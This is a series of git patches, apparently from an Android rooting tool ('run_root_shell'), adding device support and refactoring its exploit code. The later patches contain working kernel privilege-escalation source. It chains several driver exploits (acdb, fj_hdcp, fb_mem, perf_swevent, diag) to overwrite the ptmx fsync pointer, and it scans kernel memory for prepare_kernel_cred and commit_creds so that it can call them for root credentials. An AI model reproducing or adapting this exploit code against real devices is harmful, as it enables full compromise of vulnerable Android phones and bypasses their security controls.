6.2.B.0.200 --- device_database | 2 +- libperf_event_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index cd0b333..fdd510b 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit cd0b333871ffa00da5163090c1ee6de4bf766421 +Subproject commit fdd510b907e73758d2a2956a472143df786a613e diff --git a/libperf_event_exploit b/libperf_event_exploit index b62982f..e758c12 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit b62982f136d8d33bcde3c7147525826a4ced0c53 +Subproject commit e758c120781d695912c7b87b4deb37420aead29c From 584202d9be1642efb54a7a1a7674491780d50697 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sun, 7 Jul 2013 23:40:54 +0530 Subject: [PATCH 054/125] added support for Xperia J (ST26i/a) 11.2.A.0.21 --- device_database | 2 +- libperf_event_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index fdd510b..192996f 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit fdd510b907e73758d2a2956a472143df786a613e +Subproject commit 192996fc00b7a62ccd1e0627e5069f89d933d28d diff --git a/libperf_event_exploit b/libperf_event_exploit index e758c12..6b296d8 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit e758c120781d695912c7b87b4deb37420aead29c +Subproject commit 6b296d8a22c289dc7feee3f41a95ef53e9bc9716 From b7168887ec6164b04873c9818f6a93584d7efea5 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sun, 7 Jul 2013 23:46:18 +0530 Subject: [PATCH 055/125] added support for Xperia J (ST26i/a) 11.2.A.0.31 --- device_database | 2 +- libperf_event_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 192996f..b7f01fc 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 192996fc00b7a62ccd1e0627e5069f89d933d28d +Subproject commit b7f01fcf8708af3bc0df240defab46370b8d2ab1 diff --git a/libperf_event_exploit b/libperf_event_exploit index 6b296d8..52f2f1f 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 6b296d8a22c289dc7feee3f41a95ef53e9bc9716 +Subproject commit 52f2f1fcc51319799403888974981d7c34685530 From 9ef83172dc527ec5a616ec4794fd3db12219bb6d Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Mon, 8 Jul 2013 00:04:49 +0530 Subject: [PATCH 056/125] added support for Xperia L (C2104/5) 15.0.A.1.31/36 --- device_database | 2 +- libperf_event_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index b7f01fc..0546de0 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit b7f01fcf8708af3bc0df240defab46370b8d2ab1 +Subproject commit 0546de028ed4330bde8ed8c38072624c3af15cd6 diff --git a/libperf_event_exploit b/libperf_event_exploit index 52f2f1f..4071082 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 52f2f1fcc51319799403888974981d7c34685530 +Subproject commit 4071082bc7580a0030c96c85cc7c31514bbe92d8 From 9ffd97094430e64527d6df7bfc0e6632f322dbf2 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Wed, 17 Jul 2013 04:04:06 +0530 Subject: [PATCH 057/125] added support for Xperia Z (C6606) - 10.1.1.B.0.1.166 --- device_database | 2 +- libperf_event_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 0546de0..1a9a82f 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 0546de028ed4330bde8ed8c38072624c3af15cd6 +Subproject commit 1a9a82fc819ee1bedab6a06d3f5234c048bfa0d5 diff --git a/libperf_event_exploit b/libperf_event_exploit index 4071082..2411e4b 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 4071082bc7580a0030c96c85cc7c31514bbe92d8 +Subproject commit 2411e4b8c52bfcdb0cf84f86ffb758ef6e069363 From 886cdcbcda61942be24916a66ab3e12dd01a6314 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sat, 20 Jul 2013 21:24:42 +0530 Subject: [PATCH 058/125] update subproject with latest commits --- device_database | 2 +- libperf_event_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 1a9a82f..90c65a4 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 1a9a82fc819ee1bedab6a06d3f5234c048bfa0d5 +Subproject commit 90c65a4727e1eefb6f6dd0cb4e69d5d451069130 diff --git a/libperf_event_exploit b/libperf_event_exploit index 2411e4b..41b143b 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 2411e4b8c52bfcdb0cf84f86ffb758ef6e069363 +Subproject commit 41b143b1eb92f8dd107aba06f4c3d91014179ed1 From e6bc328a2405a669689317a2ab5bde705e5096db Mon Sep 17 00:00:00 2001 From: Hiroyuki Ikezoe Date: Sun, 21 Jul 2013 19:13:23 +0900 Subject: [PATCH 059/125] Update device_database --- device_database | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/device_database b/device_database index 90c65a4..2085d65 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 90c65a4727e1eefb6f6dd0cb4e69d5d451069130 +Subproject commit 2085d65e3c4861cdf7f9223fbf462d2b9f2f2e6f From 5d0fb61778d0831f7eee57c1fc0cc3c642fb9b70 Mon Sep 17 00:00:00 2001 From: Hiroyuki Ikezoe Date: Sun, 21 Jul 2013 19:20:34 +0900 Subject: [PATCH 060/125] Update libperf_event_exploit --- libperf_event_exploit | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/libperf_event_exploit b/libperf_event_exploit index 41b143b..a595dce 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 41b143b1eb92f8dd107aba06f4c3d91014179ed1 +Subproject commit a595dce06ae1d37630be6941b0afd0b6004dc758 From 1ada45b0fd70468787716ee5046aa8d661010294 Mon Sep 17 00:00:00 2001 From: fi01 Date: Tue, 23 Jul 2013 11:31:28 +0900 Subject: [PATCH 061/125] subproject with latest commits --- device_database | 2 +- libmsm_acdb_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 2085d65..d9fb114 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 2085d65e3c4861cdf7f9223fbf462d2b9f2f2e6f +Subproject commit d9fb114e6b725c218b9d293c300834cd783ddd9b diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit index 70332c2..700defd 160000 --- a/libmsm_acdb_exploit +++ b/libmsm_acdb_exploit @@ -1 +1 @@ -Subproject commit 70332c21f236e504ddf578657cba2d884b7f4135 +Subproject commit 700defd15d650a2195b3b2310cc1fa0e09d56e0f From afa2d0b2e8eae4a9b3d0e51985621f43fae11312 Mon Sep 17 00:00:00 2001 From: Hiroyuki Ikezoe Date: Tue, 23 Jul 2013 19:50:15 +0900 Subject: [PATCH 062/125] Add TARGET_C_INCLUDES to include device_database.h in submodule --- Android.mk | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/Android.mk b/Android.mk index b00a387..70027e3 100644 --- a/Android.mk +++ b/Android.mk @@ -19,6 +19,10 @@ LOCAL_STATIC_LIBRARIES += libmsm_acdb_exploit LOCAL_STATIC_LIBRARIES += libfj_hdcp_exploit LOCAL_STATIC_LIBRARIES += libcutils libc +TOP_SRCDIR := $(abspath $(LOCAL_PATH)) +TARGET_C_INCLUDES += \ + $(TOP_SRCDIR)/device_database + include $(BUILD_EXECUTABLE) include $(call all-makefiles-under,$(LOCAL_PATH)) From e70fb69f9af916852f5e4fb0fab0a13b6ad008f2 Mon Sep 17 00:00:00 2001 From: Hiroyuki Ikezoe Date: Tue, 23 Jul 2013 19:59:53 +0900 Subject: [PATCH 063/125] Update submodules --- device_database | 2 +- libdiagexploit | 2 +- libperf_event_exploit | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/device_database b/device_database index d9fb114..ffe99ec 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit d9fb114e6b725c218b9d293c300834cd783ddd9b +Subproject commit ffe99ec5b334873a4e339675907398e6d9a010e4 diff --git a/libdiagexploit b/libdiagexploit index 80d0ad5..83a2e0c 160000 --- a/libdiagexploit +++ b/libdiagexploit @@ -1 +1 @@ -Subproject commit 80d0ad59f3a271fa69a2c978de60407bbace4f9d +Subproject commit 83a2e0c09765ac7b0f2c2e138590877f37188e1e diff --git a/libperf_event_exploit b/libperf_event_exploit index a595dce..fe2f4f5 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit a595dce06ae1d37630be6941b0afd0b6004dc758 +Subproject commit fe2f4f501acf7f5a35e9415b7b4e944b914d69fd From def3c00833dc33bd9013b39084365b964f1edcc1 Mon Sep 17 00:00:00 2001 From: Hiroyuki Ikezoe Date: Tue, 23 Jul 2013 20:03:47 +0900 Subject: [PATCH 064/125] Change libdiagexploit repos --- .gitmodules | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.gitmodules b/.gitmodules index 41893e1..a5f19f8 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,6 +1,6 @@ [submodule "libdiagexploit"] path = libdiagexploit - url = git://github.com/hiikezoe/libdiagexploit.git + url = git://github.com/android-rooting-tools/libdiagexploit.git [submodule "device_database"] path = device_database url = git://github.com/android-rooting-tools/android_device_database.git From 58adb713df9d32cc21675c9bb2580ebac4aaec1f Mon Sep 17 00:00:00 2001 From: Hiroyuki Ikezoe Date: Wed, 24 Jul 2013 19:20:06 +0900 Subject: [PATCH 065/125] Should return false if fsync fails --- main.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/main.c b/main.c index 7be82fd..bde10aa 100644 --- a/main.c +++ b/main.c @@ -29,12 +29,13 @@ static bool run_obtain_root_privilege(void *user_data) { int fd; + int ret; fd = open(PTMX_DEVICE, O_WRONLY); - fsync(fd); + ret = fsync(fd); close(fd); - return true; + return (ret == 0); } static bool From 665ec12ddd34f3e563e6ae4f662db90328f4c1ea Mon Sep 17 00:00:00 2001 From: fi01 Date: Thu, 25 Jul 2013 15:02:47 +0900 Subject: [PATCH 066/125] All symbols are detected automatically with libfb_mem_exploit and libkallsyms --- .gitmodules | 6 ++ Android.mk | 7 +- cred.c | 160 +++++++++++++--------------------------- cred.h | 14 +++- device_database | 2 +- exploit.c | 174 ++++++++++++++++++++++++++++++++++++++++++++ exploit.h | 38 ++++++++++ libdiagexploit | 2 +- libfb_mem_exploit | 1 + libfj_hdcp_exploit | 2 +- libkallsyms | 1 + main.c | 149 +++++++++++++++++++++---------------- mm.c | 178 ++++++++++++++++++++++++++++++++++++++++----- mm.h | 20 +++-- ptmx.c | 72 +++++++++++++++--- ptmx.h | 20 ++++- 16 files changed, 633 insertions(+), 213 deletions(-) create mode 100644 exploit.c create mode 100644 exploit.h create mode 160000 libfb_mem_exploit create mode 160000 libkallsyms diff --git a/.gitmodules b/.gitmodules index a5f19f8..b968e90 100644 --- a/.gitmodules +++ b/.gitmodules @@ -13,3 +13,9 @@ [submodule "libfj_hdcp_exploit"] path = libfj_hdcp_exploit url = git://github.com/fi01/libfj_hdcp_exploit.git +[submodule "libkallsyms"] + path = libkallsyms + url = https://github.com/android-rooting-tools/libkallsyms.git +[submodule "libfb_mem_exploit"] + path = libfb_mem_exploit + url = https://github.com/android-rooting-tools/libfb_mem_exploit.git diff --git a/Android.mk b/Android.mk index 70027e3..7961685 100644 --- a/Android.mk +++ b/Android.mk @@ -7,17 +7,20 @@ LOCAL_SRC_FILES := \ kallsyms.c \ main.c \ mm.c \ - ptmx.c + ptmx.c \ + exploit.c LOCAL_MODULE := run_root_shell LOCAL_MODULE_TAGS := optional -LOCAL_FORCE_STATIC_EXECUTABLE := true LOCAL_STATIC_LIBRARIES := libdiagexploit LOCAL_STATIC_LIBRARIES += libdevice_database LOCAL_STATIC_LIBRARIES += libperf_event_exploit LOCAL_STATIC_LIBRARIES += libmsm_acdb_exploit LOCAL_STATIC_LIBRARIES += libfj_hdcp_exploit +LOCAL_STATIC_LIBRARIES += libfb_mem_exploit +LOCAL_STATIC_LIBRARIES += libkallsyms LOCAL_STATIC_LIBRARIES += libcutils libc +LOCAL_LDFLAGS += -static TOP_SRCDIR := $(abspath $(LOCAL_PATH)) TARGET_C_INCLUDES += \ diff --git a/cred.c b/cred.c index 604f289..5c35823 100644 --- a/cred.c +++ b/cred.c @@ -1,160 +1,104 @@ #include #include -#include -#include -#include -#include -#include -#include #include "cred.h" #include "mm.h" -#include "ptmx.h" -#include "libdiagexploit/diag.h" #include "kallsyms.h" -#include "libperf_event_exploit/perf_event.h" #include "device_database/device_database.h" -static bool -get_creds_functions_addresses(void **prepare_kernel_cred_address, void **commit_creds_address) -{ - *prepare_kernel_cred_address = (void *)device_get_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred)); - *commit_creds_address = (void*)device_get_symbol_address(DEVICE_SYMBOL(commit_creds)); +prepare_kernel_cred_t prepare_kernel_cred; +commit_creds_t commit_creds; - if (*prepare_kernel_cred_address && *commit_creds_address) { +bool +get_prepare_kernel_cred_address(void) +{ + if (prepare_kernel_cred) { return true; } - print_reason_device_not_supported(); - - return false; -} - -static uint32_t PAGE_OFFSET = 0xC0000000; + prepare_kernel_cred = (prepare_kernel_cred_t)device_get_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred)); -static void * -convert_to_kernel_address(void *address, void *mmap_base_address) -{ - return address - mmap_base_address + (void*)PAGE_OFFSET; -} + if (!prepare_kernel_cred && kallsyms_exist()) { + prepare_kernel_cred = kallsyms_get_symbol_address("prepare_kernel_cred"); + } -static void * -convert_to_mmaped_address(void *address, void *mmap_base_address) -{ - return mmap_base_address + (address - (void*)PAGE_OFFSET); + return !!prepare_kernel_cred; } -static uint32_t prepare_kernel_cred_asm[] = { 0xe59f30bc, 0xe3a010d0, 0xe92d4070, 0xe1a04000 }; -static size_t prepare_kernel_cred_asm_length = sizeof(prepare_kernel_cred_asm); -static void * -find_prepare_kernel_cred(void *mem, size_t length) +bool +get_commit_creds_address(void) { - void *prepare_kernel_cred; - - prepare_kernel_cred = memmem(mem, length, &prepare_kernel_cred_asm, prepare_kernel_cred_asm_length); - if (!prepare_kernel_cred) { - printf("Couldn't find prepare_kernel_cred address\n"); - return NULL; + if (commit_creds) { + return true; } - return prepare_kernel_cred; -} - -static uint32_t commit_creds_asm[] = { 0xe92d4070, 0xe1a0200d, 0xe3c23d7f, 0xe1a05000 }; -static size_t commit_creds_asm_length = sizeof(prepare_kernel_cred_asm); -static void * -find_commit_creds(void *mem, size_t length) -{ - void *commit_creds; + commit_creds = (commit_creds_t)device_get_symbol_address(DEVICE_SYMBOL(commit_creds)); - commit_creds = memmem(mem, length, &commit_creds_asm, commit_creds_asm_length); - if (!commit_creds) { - printf("Couldn't find commit_creds address\n"); - return NULL; + if (!commit_creds && kallsyms_exist()) { + commit_creds = kallsyms_get_symbol_address("commit_creds"); } - return commit_creds; + return !!commit_creds; } -#define KERNEL_SIZE 0x10000000 +static uint32_t prepare_kernel_cred_asm[] = { 0xe59f30bc, 0xe3a010d0, 0xe92d4070, 0xe1a04000 }; +static size_t prepare_kernel_cred_asm_length = sizeof(prepare_kernel_cred_asm); static bool -find_creds_functions_with_mmap(void *user_data) +find_prepare_kernel_cred_address_in_memory(void *mem, size_t length) { - int fd; void *address; - void *start_address = (void*) 0x10000000; - - fd = open(PTMX_DEVICE, O_RDWR); - address = mmap(start_address, KERNEL_SIZE, - PROT_READ | PROT_WRITE, MAP_SHARED | MAP_FIXED, - fd, 0); - if (address == MAP_FAILED) { - printf("Failed to mmap /dev/ptmx due to %s.\n", strerror(errno)); - close(fd); - return false; - } - prepare_kernel_cred = find_prepare_kernel_cred(address, KERNEL_SIZE); if (prepare_kernel_cred) { - commit_creds = find_commit_creds(prepare_kernel_cred + 4, KERNEL_SIZE); - - prepare_kernel_cred = convert_to_kernel_address(prepare_kernel_cred, address); - commit_creds = convert_to_kernel_address(commit_creds, address); + return true; } - munmap(address, KERNEL_SIZE); - - close(fd); - - return prepare_kernel_cred && commit_creds; -} - -static bool -find_with_diag_exploit(unsigned int ptmx_mmap_address) -{ - struct diag_values injection_data; - - injection_data.address = ptmx_mmap_address; - injection_data.value = (uint16_t)&ptmx_mmap; + address = (prepare_kernel_cred_t)memmem(mem, length, &prepare_kernel_cred_asm, prepare_kernel_cred_asm_length); + if (!address) { + return false; + } - return diag_run_exploit(&injection_data, 1, - find_creds_functions_with_mmap, NULL); + prepare_kernel_cred = (prepare_kernel_cred_t)convert_to_kernel_address(address, mem); + return true; } -static bool -find_with_perf_swevent_exploit(unsigned int ptmx_mmap_address) -{ - return perf_swevent_run_exploit(ptmx_mmap_address, (int)&ptmx_mmap, - find_creds_functions_with_mmap, NULL); -} +static uint32_t commit_creds_asm[] = { 0xe92d4070, 0xe1a0200d, 0xe3c23d7f, 0xe1a05000 }; +static size_t commit_creds_asm_length = sizeof(prepare_kernel_cred_asm); static bool -find_creds_functions_in_memory(void) +find_commit_creds_address_in_memory(void *mem, size_t length) { - unsigned long int ptmx_mmap_address; + void *address; - ptmx_mmap_address = get_ptmx_fops_address() + 0x28; + if (commit_creds) { + return true; + } - if (diag_is_supported()) { - return find_with_diag_exploit(ptmx_mmap_address); + address = (commit_creds_t)memmem(mem, length, &commit_creds_asm, commit_creds_asm_length); + if (!address) { + return false; } - return find_with_perf_swevent_exploit(ptmx_mmap_address); + + commit_creds = (commit_creds_t)convert_to_kernel_address(address, mem); + return true; } bool -setup_creds_functions(void) +get_prepare_kernel_cred_address_in_memory(void *mem, size_t length) { - if (kallsyms_exist()) { - prepare_kernel_cred = kallsyms_get_symbol_address("prepare_kernel_cred"); - commit_creds = kallsyms_get_symbol_address("commit_creds"); + if (prepare_kernel_cred) { return true; } - if (get_creds_functions_addresses((void**)&prepare_kernel_cred, (void**)&commit_creds)) { + return find_prepare_kernel_cred_address_in_memory(mem, length); +} + +bool +get_commit_creds_address_in_memory(void *mem, size_t length) +{ + if (commit_creds) { return true; } - return find_creds_functions_in_memory(); + return find_commit_creds_address_in_memory(mem, length); } - diff --git a/cred.h b/cred.h index 914e68a..01d928f 100644 --- a/cred.h +++ b/cred.h @@ -19,14 +19,22 @@ #define CREDS_H #include +#include struct cred; struct task_struct; -bool setup_creds_functions(void); +typedef struct cred *(*prepare_kernel_cred_t)(struct task_struct *); +typedef int (*commit_creds_t)(struct cred *); -struct cred *(*prepare_kernel_cred)(struct task_struct *); -int (*commit_creds)(struct cred *); +extern bool get_prepare_kernel_cred_address(); +extern bool get_commit_creds_address(); + +extern bool get_prepare_kernel_cred_address_in_memory(void *mem, size_t length); +extern bool get_commit_creds_address_in_memory(void *mem, size_t length); + +extern prepare_kernel_cred_t prepare_kernel_cred; +extern commit_creds_t commit_creds; #endif /* CREDS_H */ /* diff --git a/device_database b/device_database index ffe99ec..6b6fdc8 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit ffe99ec5b334873a4e339675907398e6d9a010e4 +Subproject commit 6b6fdc850489ae9380a272e663bb4c9d1c661f6a diff --git a/exploit.c b/exploit.c new file mode 100644 index 0000000..a1f134a --- /dev/null +++ b/exploit.c @@ -0,0 +1,174 @@ +#include +#include +#include +#include + +#include "exploit.h" +#include "mm.h" +#include "device_database.h" +#include "libdiagexploit/diag.h" +#include "libperf_event_exploit/perf_event.h" +#include "libmsm_acdb_exploit/acdb.h" +#include "libfj_hdcp_exploit/fj_hdcp.h" +#include "libfb_mem_exploit/fb_mem.h" + +typedef struct _callback_info_t { + exploit_callback_t func; + void *param; + bool result; +} callback_info_t; + +static bool +run_callback(void *param) +{ + callback_info_t *info = param; + + info->result = info->func(info->param); + + return true; +} + +static bool +attempt_diag_exploit(unsigned long int address, + unsigned long int write_value, + callback_info_t *info) +{ + struct diag_values injection_data; + + if (write_value > (uint16_t)-1) { + return false; + } + + injection_data.address = address; + injection_data.value = (uint16_t)write_value; + + return diag_run_exploit(&injection_data, 1, &run_callback, info); +} + +static bool +attempt_acdb_exploit(unsigned long int address, + unsigned long int write_value, + unsigned long int restore_value, + callback_info_t *info) +{ + if (acdb_run_exploit(address, write_value, &run_callback, info)) { + acdb_write_value_at_address(address, restore_value); + + return true; + } + + return false; +} + +static bool +attempt_fj_hdcp_exploit(unsigned long int address, + unsigned long int write_value, + unsigned long int restore_value, + callback_info_t *info) +{ + if (fj_hdcp_run_exploit(address, write_value, &run_callback, info)) { + fj_hdcp_write_value_at_address(address, restore_value); + + return true; + } + + return false; +} + +static bool +attempt_fb_mem_exploit(unsigned long int address, + unsigned long int write_value, + unsigned long int restore_value, + callback_info_t *info) +{ + unsigned long int kernel_physical_offset; + + kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset)); + if (kernel_physical_offset) { + fb_mem_set_kernel_phys_offset(kernel_physical_offset - 0x00008000); + } + + if (fb_mem_write_value_at_address(address, write_value)) { + run_callback(info); + + fb_mem_write_value_at_address(address, restore_value); + + return true; + } + + return false; +} + +bool +attempt_exploit(unsigned long int address, + unsigned long int write_value, + unsigned long int restore_value, + exploit_callback_t callback_func, + void *callback_param) +{ + callback_info_t info; + + info.func = callback_func; + info.param = callback_param; + info.result = false; + + // Attempt exploits in most stable order + + printf("Attempt acdb exploit...\n"); + if (attempt_acdb_exploit(address, write_value, restore_value, &info)) { + return info.result; + } + printf("\n"); + + printf("Attempt fj_hdcp exploit...\n"); + if (attempt_fj_hdcp_exploit(address, write_value, restore_value, &info)) { + return info.result; + } + printf("\n"); + + printf("Attempt fb_mem exploit...\n"); + if (attempt_fb_mem_exploit(address, write_value, restore_value, &info)) { + return info.result; + } + printf("\n"); + + printf("Attempt perf_swevent exploit...\n"); + if (perf_swevent_run_exploit(address, write_value, &run_callback, &info)) { + return info.result; + } + printf("\n"); + + if (attempt_diag_exploit(address, write_value, &info)) { + return info.result; + } + + return false; +} + +bool +attempt_mmap_exploit(exploit_mmap_callback_t callback_func, void *callback_param) +{ + unsigned long int kernel_physical_offset; + int fd; + void *address; + bool result; + + kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset)); + if (kernel_physical_offset) { + fb_mem_set_kernel_phys_offset(kernel_physical_offset - 0x00008000); + } + + printf("Attempt fb_mem exploit...\n"); + address = fb_mem_mmap(&fd); + if (address == MAP_FAILED) { + return false; + } + + result = callback_func(fb_mem_convert_to_mmaped_address((void *)PAGE_OFFSET, address), + KERNEL_SIZE, + callback_param); + + fb_mem_munmap(address, fd); + + return result; +} diff --git a/exploit.h b/exploit.h new file mode 100644 index 0000000..f87ed99 --- /dev/null +++ b/exploit.h @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2013 Hiroyuki Ikezoe + * + * This program is free software: you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program. If not, see . + * + */ +#ifndef __EXPLOIT_H__ +#define __EXPLOIT_H__ + +#include + +typedef bool (*exploit_callback_t)(void *param); +typedef bool (*exploit_mmap_callback_t)(void *mem, size_t length, void *param); + +extern bool attempt_exploit(unsigned long int address, + unsigned long int write_value, + unsigned long int restore_value, + exploit_callback_t callback_func, + void *callback_param); + +extern bool attempt_mmap_exploit(exploit_mmap_callback_t callback_func, + void *callback_param); + +#endif /* __EXPLOIT_H__ */ +/* +vi:ts=2:nowrap:ai:expandtab:sw=2 +*/ diff --git a/libdiagexploit b/libdiagexploit index 83a2e0c..4dd7f1b 160000 --- a/libdiagexploit +++ b/libdiagexploit @@ -1 +1 @@ -Subproject commit 83a2e0c09765ac7b0f2c2e138590877f37188e1e +Subproject commit 4dd7f1b0dadb3ae5d8a914e1e22979c7bed3b6c3 diff --git a/libfb_mem_exploit b/libfb_mem_exploit new file mode 160000 index 0000000..02ca1c9 --- /dev/null +++ b/libfb_mem_exploit @@ -0,0 +1 @@ +Subproject commit 02ca1c9ce0277b169373dde32f46386a3173f1b2 diff --git a/libfj_hdcp_exploit b/libfj_hdcp_exploit index cb172ec..d1915b8 160000 --- a/libfj_hdcp_exploit +++ b/libfj_hdcp_exploit @@ -1 +1 @@ -Subproject commit cb172ec96947c0f00033eb461a6718c6e6d7c2a6 +Subproject commit d1915b8cb18c917340a83c6807c5a5fe1053902a diff --git a/libkallsyms b/libkallsyms new file mode 160000 index 0000000..4c910a5 --- /dev/null +++ b/libkallsyms @@ -0,0 +1 @@ +Subproject commit 4c910a5580841d9fb2738804ae1b24dbd02834d2 diff --git a/main.c b/main.c index bde10aa..6d3bec7 100644 --- a/main.c +++ b/main.c @@ -14,10 +14,7 @@ #include "cred.h" #include "mm.h" #include "ptmx.h" -#include "libdiagexploit/diag.h" -#include "libperf_event_exploit/perf_event.h" -#include "libmsm_acdb_exploit/acdb.h" -#include "libfj_hdcp_exploit/fj_hdcp.h" +#include "exploit.h" void obtain_root_privilege(void) @@ -39,91 +36,124 @@ run_obtain_root_privilege(void *user_data) } static bool -attempt_diag_exploit(unsigned long int address) +run_exploit(void) +{ + get_ptmx_fops_fsync_address(); + if (!ptmx_fops_fsync_address) { + return false; + } + + return attempt_exploit(ptmx_fops_fsync_address, + (unsigned long int)&obtain_root_privilege, 0, + run_obtain_root_privilege, NULL); +} + +void +device_detected(void) { - struct diag_values injection_data; + char device[PROP_VALUE_MAX]; + char build_id[PROP_VALUE_MAX]; - injection_data.address = address; - injection_data.value = (uint16_t)&obtain_root_privilege; + __system_property_get("ro.product.model", device); + __system_property_get("ro.build.display.id", build_id); - return diag_run_exploit(&injection_data, 1, - run_obtain_root_privilege, NULL); + printf("\n\nDevice detected: %s (%s)\n\n", device, build_id); } static bool -attempt_acdb_exploit(unsigned long int address, unsigned long int original_value) +find_ptmx_fops_address(void *mem, size_t length) { - if (acdb_run_exploit(address, (int)&obtain_root_privilege, - run_obtain_root_privilege, NULL)) { + find_ptmx_fops_hint_t hint; - acdb_write_value_at_address(address, original_value); + hint.ptmx_open_address = kallsyms_in_memory_lookup_name("ptmx_open"); + if (!hint.ptmx_open_address) { + return false; + } - return true; + hint.tty_release_address = kallsyms_in_memory_lookup_name("tty_release"); + if (!hint.tty_release_address) { + return false; } - return false; + hint.tty_fasync_address = kallsyms_in_memory_lookup_name("tty_fasync"); + if (!hint.tty_fasync_address) { + return false; + } + + return get_ptmx_fops_address_in_memory(mem, length, &hint); } -static bool -attempt_fj_hdcp_exploit(unsigned long int address, unsigned long int original_value) +bool find_variables_in_memory(void *mem, size_t length) { - if (fj_hdcp_run_exploit(address, (int)&obtain_root_privilege, - run_obtain_root_privilege, NULL)) { + printf("Search address in memroy...\n"); - fj_hdcp_write_value_at_address(address, original_value); + if (kallsyms_in_memory_init(mem, length)) { + printf("Using kallsyms_in_memroy...\n"); - return true; + if (!prepare_kernel_cred) { + prepare_kernel_cred = (prepare_kernel_cred_t)kallsyms_in_memory_lookup_name("prepare_kernel_cred"); + } + + if (!commit_creds) { + commit_creds = (commit_creds_t)kallsyms_in_memory_lookup_name("commit_creds"); + } + + if (!ptmx_fops) { + ptmx_fops = (void *)kallsyms_in_memory_lookup_name("ptmx_fops"); + + if (!ptmx_fops) { + find_ptmx_fops_address(mem, length); + } + } + + if (prepare_kernel_cred && commit_creds && ptmx_fops) { + return true; + } } - return false; + get_prepare_kernel_cred_address_in_memory(mem, length); + get_commit_creds_address_in_memory(mem, length); + + return prepare_kernel_cred && commit_creds && ptmx_fops; } -static bool -run_exploit(void) +bool +setup_variables(void) { - unsigned long int ptmx_fsync_address; - unsigned long int ptmx_fops_address; + get_prepare_kernel_cred_address(); + get_commit_creds_address(); + get_ptmx_fops_address(); - ptmx_fops_address = get_ptmx_fops_address(); - if (!ptmx_fops_address) { - return false; + if (prepare_kernel_cred && commit_creds && ptmx_fops) { + return true; } - ptmx_fsync_address = ptmx_fops_address + 0x38; + printf("Try to find address in memory...\n"); + run_with_mmap(find_variables_in_memory); + if (prepare_kernel_cred && commit_creds && ptmx_fops) { + printf(" prepare_kernel_cred = %p\n", prepare_kernel_cred); + printf(" commit_creds = %p\n", commit_creds); + printf(" ptmx_fops = %p\n", ptmx_fops); - printf("Attempt perf_swevent exploit...\n"); - if (perf_swevent_run_exploit(ptmx_fsync_address, (int)&obtain_root_privilege, - run_obtain_root_privilege, NULL)) { return true; } - printf("\n"); - printf("Attempt acdb exploit...\n"); - if (attempt_acdb_exploit(ptmx_fsync_address, 0)) { - return true; + if (!prepare_kernel_cred) { + printf("Failed to get prepare_kernel_cred addresses.\n"); } - printf("\n"); - printf("Attempt fj_hdcp exploit...\n"); - if (attempt_fj_hdcp_exploit(ptmx_fsync_address, 0)) { - return true; + if (!commit_creds) { + printf("Failed to get commit_creds addresses.\n"); } - printf("\n"); - - return attempt_diag_exploit(ptmx_fsync_address); -} -void -device_detected(void) -{ - char device[PROP_VALUE_MAX]; - char build_id[PROP_VALUE_MAX]; + if (!ptmx_fops) { + printf("Failed to get ptmx_fops addresses.\n"); + } - __system_property_get("ro.product.model", device); - 